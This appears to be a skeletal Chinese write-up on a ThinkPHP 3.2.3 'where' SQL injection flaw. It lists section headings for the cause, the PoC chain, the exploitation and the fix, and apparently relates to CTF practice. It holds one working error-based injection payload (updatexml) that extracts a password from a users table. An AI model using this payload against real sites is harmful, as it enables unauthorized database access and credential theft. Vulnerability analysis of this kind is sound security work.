Thinkphp3.2.3 where注入 浅分析漏洞原理及修复
0x01引子
0x02分析
找到截断方法
找到_parseType的入口
找到生成sql语句的代码
0x03 poc链
0x04 利用示范
payload:
http://localhost:3000/index.php
?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23
0x05修复方法
搞CTF